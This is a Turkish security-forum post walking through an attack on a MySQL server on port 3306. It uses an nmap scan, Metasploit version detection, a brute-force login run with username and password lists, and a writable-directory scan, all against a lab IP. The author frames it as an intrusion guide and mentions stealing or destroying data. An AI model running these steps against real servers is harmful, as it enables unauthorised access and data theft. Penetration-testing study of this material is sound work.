İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

[Dev Konu ] MySql Sızma // Port 3306 // RootAdam

09-01-2019 15:41
#1
RootAdam - ait Kullanıcı Resmi (Avatar)
Siber İstihbarat Uzmanı (Stajyer)
Üyelik tarihi:
12/2018
Nereden:
GİZLİ BİLGİ
Mesajlar:
554
Teşekkür (Etti):
262
Teşekkür (Aldı):
334
Konular:
87
Ticaret:
(0) %



Merhaba Ben RootAdam Bu Konumda MYSQL 3306 Porttan Sızma Yollarını Gösterecğim Umarım Yararlı Olur ...


~ MYSQL 3306 PORT SIZMA ~


~~ BİLGİ TOPLAMA ~~

Tarama, sızdırma testlerinde önemli bir rol oynar, çünkü tarama saldırganı saldırı için hangi hizmetlerin ve açık bağlantı noktalarının kullanılabilir olduğundan emin olur

Burada 3306 numaralı portu taramak için nmap kullanıyoruz !


Kod:
  nmap -sT 192.168.1.216







Saldırgan, Banner Grabbing olarak bilinen yazılım sürümü gibi önemli bilgilerini bulmak O Sistem Hakkında Bilgi Veririr M e t a s p l o i t Kullanacağız !

Kod:
 
use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set rhosts 192.168.1.216
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > run






~~ MYSQL (Kaba Kuvet Saldırısı ) Brute Force Attack ~~




Kod:
 msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.216
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run

Bu kaba kuvvet saldırısını başlatır ve user.txt ve pass.txt dosyasını kullanarak geçerli kullanıcı adı ve şifre kombinasyonunu eşleştirmeye çalışır...






mysql sunucumuzun kaba kuvvet saldırısına karşı güvenli olmadığını görebilirsiniz, çünkü kullanıcı adı: root ve password: toor

Geçerli kimlik bilgilerini aldıktan sonra, veritabanı bilgilerini çalmak veya yok etmek için doğrudan mysql sunucusuna giriş yapabilir...

~~ SIZMA ~~




Giriş yaptıktan sonra MySQL SELECT INTO DUMPFILE özelliğini kullanarak yazma , düzeneleme v.s yetkimizin olduğu Dizini Bulacağız m e t a s p l o i t i kullanacağız .


Kod:
  
use auxiliary/scanner/mysql/mysql_writable_dirs
msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216
msf auxiliary(mysql_writable_dirs) > set username root
msf auxiliary(mysql_writable_dirs) > set password toor
msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt
msf auxiliary(mysql_writable_dirs) > run




Gördüğünüz Gibi /tmp Dizininde Yazma Yetkimiz Var Sonrası Sizin Ellerinizde



TEŞEKKÜRLER ...
İYİ FORUMLAR ...


Kullanıcı İmzası
Anlamadığınız Sorunları Bilmediğiniz Yöntemler İle Çözen Kişi !

Telegram : RootAdam

E-Mail : RootAdam@protonmail.com
Konu RootAdam tarafından (09-01-2019 16:07 Saat 16:07 ) değiştirilmiştir.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı